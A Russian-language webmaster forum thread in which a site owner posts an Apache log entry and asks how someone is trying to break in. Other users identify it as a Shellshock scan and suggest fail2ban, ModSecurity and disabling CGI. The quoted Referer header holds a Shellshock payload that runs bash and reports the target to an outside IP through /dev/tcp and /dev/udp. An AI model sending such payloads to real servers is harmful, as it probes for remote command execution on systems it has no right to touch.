Пробуют взломать сайт через cgi-bin php-cgi

12
C
На сайте с 07.05.2010
Offline
241
4059

Подскажите, пожалуйста, каким способом пытаются взломать сайт. В логах:


[Thu Feb 26 04:28:31 2015] [error] [client 91.109.2.132] script not found or unable to stat: /var/www/cgi-bin/php-cgi, referer: () { :;}; /bin/bash -c "echo site.ru/cgi-bin/php-cgi > /dev/tcp/213.233.161.42/23; echo site/cgi-bin/php-cgi > /dev/udp/213.233.161.42/80"

Что-то в скрипты заливают или как?

Mik Foxi
На сайте с 02.03.2011
Offline
1199
#1

Ну чтото уже значит залито. Ищите дырку и залитые вредоносные скрипты. Ну и серверное ПО обновите.

Антибот, антиспам, веб фаервол, защита от накрутки поведенческих: https://antibot.cloud/ (Зеркало: https://антибот.рф/ ) Форум на замену серчу: https://foxi.biz/
A
На сайте с 19.07.2010
Offline
130
#2

Как я понял, в логах 404-я ошибка - "script not found or unable to stat", т.е. ничего пока "не залито".

Похоже на обычный скан с поиском скриптов, которые используют дырявый bash.

.............
C
На сайте с 07.05.2010
Offline
241
#3

А можете подсказать, как обезопасить себя от такого сканирования?

kxk
На сайте с 30.01.2005
Offline
990
kxk
#4

ctit, Парсить через fail2ban логи и блокировать:)

Ваш DEVOPS
L
На сайте с 07.12.2007
Offline
351
#5
ctit:
Подскажите, пожалуйста, каким способом пытаются взломать сайт.

/ru/forum/867276

Если bash недоступен как CGI-скрипт - можно забить.

C
На сайте с 07.05.2010
Offline
241
#6

Недоступен, однако просто интересует как они пролезли на уровень выполнения команд? Т.е. эту команду как посылали?

K
На сайте с 06.03.2014
Offline
7
#7

Могли послать через куки,могли через referer,подробнее тут http://habrahabr.ru/company/mailru/blog/238475/

Оптимизайка
На сайте с 11.03.2012
Offline
396
#8

Да просто сканят на уязвимость, которую вам привели выше. Таких сканов обычно тучи бывают разных, расслабьтесь, все нормально.

Хотите обезопаситься от подобных сканов - ModSecurity + OWASP CoreRuleSet

⭐ BotGuard (https://botguard.net) ⭐ — защита вашего сайта от вредоносных ботов, воровства контента, клонирования, спама и хакерских атак!
N
На сайте с 06.05.2007
Offline
419
#9
ctit:
Недоступен, однако просто интересует как они пролезли на уровень выполнения команд? Т.е. эту команду как посылали?

Посмотрите конфигурационный файл на предмет "ScriptAlias" или "ExecCGI".

Если используете панель - выключайте поддержку cgi. Это почти неактуальная технология.

Кнопка вызова админа ()
MZ
На сайте с 27.01.2007
Offline
88
#10
netwind:
...выключайте поддержку cgi. Это почти неактуальная технология.

если болит голова, используйте гильотину...

404 Not Found
12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий